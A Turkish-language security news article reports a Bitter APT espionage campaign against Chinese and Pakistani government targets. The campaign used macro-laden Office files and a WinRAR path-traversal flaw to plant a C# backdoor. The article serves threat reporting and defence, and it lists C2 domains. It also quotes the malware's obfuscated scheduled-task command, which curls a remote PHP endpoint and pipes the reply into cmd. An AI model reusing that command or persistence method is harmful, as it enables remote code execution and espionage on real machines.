APT-Q-37 olarak da takip edilen ve Çin’de 蔓灵花 olarak bilinen Bitter APT grubu, Çin ve Pakistan genelinde devlet kurumlarını, askeri tesisleri ve kritik altyapıyı hedef alan karmaşık bir siber casusluk kampanyası başlattı.
Tehdit aktörü, kurban sistemlerine özel C# arka kapıları yüklemek için WinRAR arşiv yazılımındaki daha önce bilinmeyen bir sıfır gün güvenlik açığından yararlanan, silah haline getirilmiş Microsoft Office belgelerini dağıttı.
Bu çok yönlü saldırı, grubun teknik yeteneklerinde ve kalıcılık mekanizmalarında önemli bir gelişme olduğunu gösteriyor.
Kampanya, kötü amaçlı yükler sağlamak için iki farklı enfeksiyon vektöründen yararlanıyor. İlk yöntem, meşru konferans belgeleri olarak gizlenen VBA makro yüklü Excel dosyalarını kullanırken, ikincisi, CVE-2023-38088’den önceki bir WinRAR yol geçiş güvenlik açığından yararlanıyor.
Her iki yaklaşım da sonuçta hassas verileri sızdırmak ve uzak sunuculardan rastgele komutları yürütmek için tasarlanmış aynı C# arka kapısını dağıtır.
Saldırganlar, hükümet ve savunma sektörlerindeki belirli personeli hedef almak için sosyal mühendislik tuzaklarını dikkatli bir şekilde hazırladılar; bu, önceden yapılan keşif ve kurban profilinin belirlenmesini gösteriyordu.
Qianxin analistleri, güvenliği ihlal edilmiş sistemlerden kaynaklanan anormal ağ trafiği modellerini tespit ettikten sonra Ekim 2024’te kötü amaçlı etkinliği tespit etti.
Araştırmacılar, altyapının izini, özellikle bu operasyon için Nisan 2024’te kaydedilen esanojinjasvc.com alanında barındırılan komuta ve kontrol sunucularına kadar takip etti.
Analiz, arka kapının msoffice.365cloudz.esanojinjasvc.com da dahil olmak üzere birden fazla alt alan adıyla iletişim kurduğunu ve ağ tabanlı algılama sistemlerinden kaçmak için gelişmiş şifreleme teknikleri kullandığını ortaya çıkardı.
Saldırı zinciri, kurbanların “AJK.rar için Sektörel Bilgi Sağlama” gibi adlarla kötü amaçlı RAR arşivleri içeren kimlik avı e-postaları almasıyla başlar.
Güvenlik açığı bulunan WinRAR sürümleriyle (7.11 veya daha önceki sürümler) ayıklamanın ardından arşiv, kullanıcının Normal.dotm şablon dosyasının üzerine yazmak için bir yol geçiş kusurundan yararlanır.
.webp)
Microsoft Word daha sonra başlatıldığında, güvenliği ihlal edilmiş şablonu otomatik olarak yükler ve SMB ağ paylaşımlarını kullanarak koliwooclients.com uzak sunucusundan winnsc.exe arka kapısını indirip çalıştıran gömülü makroları tetikler.
Kalıcılık Mekanizmaları ve Arka Kapı İşlevselliği
Kötü amaçlı yazılım, sürekli erişimi sağlamak için birden fazla yedek mekanizma aracılığıyla kalıcılık sağlar.
Makro kodu, adı verilen bir işlevi uygular. periperi() Bu, Windows Başlangıç dizininde kefe.bat adlı bir toplu iş dosyası oluşturur.
Bu komut dosyası, her 26 dakikada bir yürütülen ve hxxps://www.keeferbeautytrends.com/d6Z2.php adresine POST istekleri gönderen “OneDrive\Updates1100988844” başlıklı zamanlanmış bir görev oluşturur.
Zamanlanmış görev komutu, imza tabanlı tespitten kaçınmak için dize gizleme tekniklerini kullanır: –
s^ch^t^a^s^k^s /create /tn "OneDrive\Updates1100988844" /f /sc minute /mo 26 /tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& curl !465!.com/d6Z2.p^h^p?rz=%computername%SS | c^m^d"C# arka kapısı, adlı özel bir şifre çözme işlevi aracılığıyla dize gizleme için AES şifrelemesini kullanır. gjfdkgitjkg().
Bu işlev, C2 URL’leri, dosya yolları ve POST parametreleri dahil olmak üzere kritik yapılandırma verilerinin şifresini çözer.
Arka kapı, geçici dizin yolu, işletim sistemi mimarisi ve ana bilgisayar adı dahil olmak üzere sistem bilgilerini sürekli olarak toplayarak bu verileri hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php adresine iletir.
Kötü amaçlı yazılım, C2 sunucusu yanıtlarına dayanarak ek yürütülebilir dosyalar indirir ve DOS imzasını ekleyerek PE başlıklarını onarır. {0x4D 0x5A}dosya yapısını doğrular ve başarı veya başarısızlık kodlarını hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxcvg45.php adresine bildirirken bunları yürütür.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
